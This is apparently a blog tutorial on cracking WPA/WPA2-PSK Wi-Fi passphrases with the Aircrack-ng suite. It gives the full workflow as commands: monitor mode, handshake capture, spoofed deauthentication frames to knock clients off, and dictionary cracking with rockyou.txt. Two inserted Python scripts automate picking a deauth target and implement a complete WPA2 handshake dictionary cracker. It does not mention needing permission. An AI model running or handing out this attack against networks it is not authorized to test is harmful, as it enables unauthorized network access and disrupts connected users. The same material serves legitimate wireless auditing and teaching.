Cracking WPA/WPA2 with Aircrack-ng for n00bs

sc015020
3 min read · Jun 8, 2020


This post gives a simple explanation of how to capture the authentication handshake of a Wi-Fi network running WPA/WPA2 in PSK (Pre-Shared Key) mode and how to run a dictionary attack against it with Aircrack-ng to recover the passphrase.

WPA and WPA2 support several authentication methods; PSK (Pre-Shared Key, also called WPA-Personal) is the one most widely used in home and small-office networks and the one attacked here. With PSK every device shares the same passphrase, so recovering it from one captured handshake gives access to the whole network.

Capture the handshake

Make sure that your wireless card supports monitor mode, which lets you see all wireless traffic on a channel, including frames that are not addressed to your card.

Monitor mode

Put the wireless card into monitor mode with airmon-ng. In monitor mode the card passes every frame it hears on the channel up to you, not only frames addressed to it. You can add a channel number after the interface name to lock the card to that channel right away.

airmon-ng start <interface> 
airmon-ng start wlan0

When you run ifconfig (or iwconfig) afterwards, you will notice that the interface has been renamed from wlan0 to wlan0mon. airmon-ng also lists processes such as NetworkManager or wpa_supplicant that may interfere with monitor mode; if it does, stop them with airmon-ng check kill before continuing, otherwise they may pull the card off the channel or reset it while you are capturing.

Display all Wi-Fi access points and the clients talking to them with airodump-ng. Note the target's BSSID (the AP's MAC address), its channel and the MAC addresses of any associated clients in the STATION list; you need all three later.

airodump-ng <interface>
airodump-ng wlan0mon

Select an AP from the list and restart airodump-ng locked to the AP's channel and filtered on its BSSID, writing the capture to a file so that the handshake is saved. The -w prefix produces capture-01.cap (the packets) and capture-01.csv (the AP and client list); airodump-ng shows "WPA handshake: <BSSID>" in its top-right corner once it has recorded one.

airodump-ng -c <channel> --bssid <BSSID> -w <filename> <interface>
airodump-ng -c 3 --bssid 68:92:34:2B:AA:38 -w capture wlan0mon

There are two ways to get the handshake. Passively, by simply waiting for a client to connect (or reconnect) to the WPA/WPA2 network. Or actively, by injecting deauthentication frames at a client that is already connected, which forces it to reconnect and redo the 4-way handshake.

De-authentication

In the active approach, use aireplay-ng to deauthenticate a wireless client. This requires that a client is currently associated with the AP. aireplay-ng sends the client a spoofed deauthentication frame, apparently from the AP, telling it that it is no longer associated; the client then reauthenticates with the AP and performs a fresh 4-way handshake, which airodump-ng records.

aireplay-ng -0 1 -a <BSSID> -c <client's MAC address> wlan0mon

Here -0 selects deauthentication mode, 1 is the number of deauthentication bursts to send (0 keeps sending until you stop it), -a is the AP's BSSID and -c the client's MAC address. If you don't specify a client, the deauthentication is broadcast to all clients of the AP; directed deauthentication is more reliable, since not every client reacts to the broadcast version. Keep airodump-ng running on the same channel in another terminal while you do this, otherwise the handshake is not captured.
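The client to pass to -c can be read off airodump-ng's screen, but when an AP has many clients it is easier to pull it from the CSV that -w writes next to the .cap file. The following is an added example, not code from the post or from the Aircrack-ng project. It assumes the two-section layout airodump-ng writes (an access-point table, then a table whose header starts with "Station MAC") and runs on a constructed sample in that layout, using the post's BSSID and made-up client MACs; stations marked "(not associated)" are the edge case it filters out, because deauthenticating them produces no handshake.

```python
"""Added example (not from the original post or from Aircrack-ng):
pick the station for `aireplay-ng -c` from the CSV written by
`airodump-ng -w capture` (capture-01.csv next to capture-01.cap).

Assumes airodump-ng's two-section CSV: access points first, then a table
whose header row starts with "Station MAC". SAMPLE_CSV below is constructed
in that layout; the BSSID is the post's, the client MACs are made up.
"""
import csv

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
68:92:34:2B:AA:38, 2020-06-08 10:00:01, 2020-06-08 10:05:30,  3,  54, WPA2, CCMP, PSK, -45,      120,        0,   0.  0.  0.  0,   7, TestNet, 
AA:BB:CC:DD:EE:01, 2020-06-08 10:00:02, 2020-06-08 10:05:30, 11,  54, WPA2, CCMP, PSK, -70,       80,        0,   0.  0.  0.  0,   5, Other, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:55, 2020-06-08 10:00:05, 2020-06-08 10:05:29, -50,       35, 68:92:34:2B:AA:38, TestNet
00:11:22:33:44:66, 2020-06-08 10:01:00, 2020-06-08 10:05:20, -62,        4, 68:92:34:2B:AA:38, 
00:11:22:33:44:77, 2020-06-08 10:02:00, 2020-06-08 10:05:00, -80,        2, (not associated), TestNet,Other
"""


def split_sections(text):
    # The station table starts at the line beginning with "Station MAC";
    # everything above it is the access-point table.
    lines = text.splitlines()
    for i, line in enumerate(lines):
        if line.startswith("Station MAC"):
            return lines[:i], lines[i:]
    raise ValueError("no station section found in airodump-ng CSV")


def parse_stations(text):
    # Columns are located by header name, so extra trailing fields
    # (the probed-ESSID list itself contains commas) do not matter.
    _, sta_lines = split_sections(text)
    rows = [[c.strip() for c in r] for r in csv.reader(sta_lines) if r]
    header, body = rows[0], rows[1:]
    idx = {name: header.index(name) for name in ("Station MAC", "Power", "# packets", "BSSID")}
    stations = []
    for r in body:
        if len(r) <= idx["BSSID"]:
            continue
        stations.append({
            "mac": r[idx["Station MAC"]],
            "power": int(r[idx["Power"]]),
            "packets": int(r[idx["# packets"]]),
            "bssid": r[idx["BSSID"]],
        })
    return stations


def clients_of(stations, bssid):
    # Only stations associated with the target AP can be deauthenticated into
    # a new handshake; "(not associated)" entries never match.
    assoc = [s for s in stations if s["bssid"].upper() == bssid.upper()]
    # Prefer the chattiest, strongest client: most likely still present and to reconnect.
    return sorted(assoc, key=lambda s: (s["packets"], s["power"]), reverse=True)


def deauth_command(bssid, stations, iface="wlan0mon", count=1):
    # Build the directed aireplay-ng command line, or None if no client was seen
    # (then a broadcast deauth has nobody to reconnect; wait passively instead).
    clients = clients_of(stations, bssid)
    if not clients:
        return None
    return f"aireplay-ng -0 {count} -a {bssid} -c {clients[0]['mac']} {iface}"


if __name__ == "__main__":
    print(deauth_command("68:92:34:2B:AA:38", parse_stations(SAMPLE_CSV)))
```

Run it against the real file with open("capture-01.csv").read() in place of SAMPLE_CSV; the csv module handles the CRLF line endings airodump-ng writes.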

Aircrack-ng

Aircrack-ng is the best-known tool for cracking a WPA/WPA2 PSK once the handshake has been captured. Only guessing attacks are possible, because the passphrase itself is never sent over the air: it is stretched into a 256-bit PMK with PBKDF2-SHA1 (4096 iterations, with the SSID as salt), the PMK is combined with the two MAC addresses and the two nonces from the handshake into the session key (PTK), and part of that key produces the MIC that authenticates the handshake messages. A candidate passphrase can therefore only be checked by redoing this derivation and comparing the result with the MIC in the captured 4-way handshake, which is why the handshake is the only useful thing to capture and why each guess is comparatively expensive. There is no practical difference between cracking WPA and WPA2: the key derivation is the same, only the cipher suite and the MIC algorithm differ (TKIP with HMAC-MD5 versus CCMP with HMAC-SHA1). A PSK passphrase is 8 to 63 characters long, so exhausting the full space is out of reach; a dictionary attack only succeeds if the passphrase is in the wordlist. For simplicity, the wordlist rockyou.txt is used to demonstrate how this works.

Run aircrack-ng in wordlist mode, passing the wordlist with -w and the capture file as the last argument. If the capture contains several networks, aircrack-ng asks which one to crack; you can preselect it with -b <BSSID>.

aircrack-ng -w rockyou.txt capture-01.cap

Aircrack-ng prints KEY FOUND! followed by the passphrase as soon as a wordlist entry reproduces the captured MIC. If it reaches the end of the wordlist without a match, the passphrase is simply not in it and you need a different wordlist or a faster cracker. If it reports that no valid WPA handshake was found, the capture is incomplete (it needs at least two consecutive handshake messages) and you have to capture again.
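To make concrete what aircrack-ng computes for every wordlist entry, here is an added example that is not aircrack-ng's code and not from the original post: a from-scratch WPA2-PSK key derivation and MIC check, run as a dictionary attack against a constructed handshake. The SSID "TestNet", the client MAC 00:11:22:33:44:55, the nonces, the RSN information element and the five-entry wordlist are all made up for the demo; the AP MAC is the post's BSSID. It goes slightly beyond the post in also covering the original-WPA (TKIP, HMAC-MD5) MIC variant and the 8-to-63-character passphrase filter.

```python
"""Added example, not aircrack-ng's code: a from-scratch WPA2-PSK dictionary
attack on a constructed 4-way handshake, showing exactly what is tested per
candidate passphrase and why nothing but guessing works.

Assumed/made up for the demo: SSID "TestNet", client MAC 00:11:22:33:44:55,
the nonces, the RSN IE and WORDLIST. AP_MAC is the post's BSSID.
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    # This is the expensive step (8192 HMAC-SHA1 calls per guess) and the
    # reason GPU crackers are so much faster than aircrack-ng on a CPU.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    # 802.11 PRF-X: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ...
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce) -> bytes:
    # PTK = PRF-384(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces)).
    # Everything here except the PMK is visible in the captured handshake.
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)


MIC_OFFSET = 81  # 4-byte EAPOL header + 77 bytes of key descriptor precede the 16-byte MIC


def eapol_mic(kck: bytes, frame: bytes, wpa2: bool = True) -> bytes:
    # MIC over the whole EAPOL-Key frame with its MIC field zeroed, keyed by KCK = PTK[0:16].
    # WPA2/CCMP (key descriptor version 2) uses HMAC-SHA1 truncated to 16 bytes;
    # original WPA/TKIP (version 1) uses HMAC-MD5.
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1 if wpa2 else hashlib.md5).digest()[:16]


def build_eapol_msg2(snonce: bytes, rsn_ie: bytes) -> bytes:
    # Message 2 of the 4-way handshake (client -> AP) with the MIC field still zero.
    body = (b"\x02"                                  # descriptor type: RSN (WPA2)
            + b"\x01\x0a"                            # key info: pairwise, MIC present, version 2
            + b"\x00\x00"                            # key length (0 in message 2)
            + (1).to_bytes(8, "big")                 # replay counter
            + snonce                                 # key nonce = SNonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # key IV, key RSC, key ID
            + b"\x00" * 16                           # key MIC (filled in by the client)
            + len(rsn_ie).to_bytes(2, "big") + rsn_ie)   # key data: the client's RSN IE
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v1, type EAPOL-Key


def crack(ssid, ap_mac, client_mac, anonce, snonce, msg2, wordlist, wpa2=True):
    # The only check a handshake allows: does this candidate reproduce the captured MIC?
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:  # WPA passphrases are 8..63 characters; skip the rest
            continue
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2, wpa2), captured_mic):
            return candidate
    return None


# Constructed handshake standing in for capture-01.cap (all values made up except AP_MAC).
SSID = "TestNet"
AP_MAC = bytes.fromhex("6892342baa38")            # the post's BSSID 68:92:34:2B:AA:38
CLIENT_MAC = bytes.fromhex("001122334455")        # made-up client
ANONCE = hashlib.sha256(b"demo anonce").digest()  # fixed 32-byte nonces for reproducibility
SNONCE = hashlib.sha256(b"demo snonce").digest()
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # WPA2-PSK, CCMP
WORDLIST = ["password", "123456", "letmein", "sunflower42", "qwertyuiop"]


def make_handshake(passphrase: str) -> bytes:
    # What the real client does: derive the PTK from the true PSK and fill in the MIC.
    frame = build_eapol_msg2(SNONCE, RSN_IE)
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def demo(wordlist=WORDLIST, secret="sunflower42"):
    # Returns the recovered passphrase, or None if it is not in the wordlist.
    return crack(SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, make_handshake(secret), wordlist)


if __name__ == "__main__":
    print("KEY FOUND:", demo())
```

Every candidate costs the full PBKDF2 run plus a handful of extra HMACs for the PTK and MIC, so a CPU manages only a few thousand guesses per second; against a wordlist with millions of entries that is minutes to hours, which is where GPU cracking comes in. Note also that the SSID is the salt: a PMK computed for "TestNet" is useless against another network with the same passphrase, so precomputed tables only work per SSID.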

Later on, I will also write a tutorial on using Hashcat for WPA cracking, which can use the GPU to speed up the cracking considerably.



sc015020

Running IT security analyst. Passionate about (wireless) networks and security overall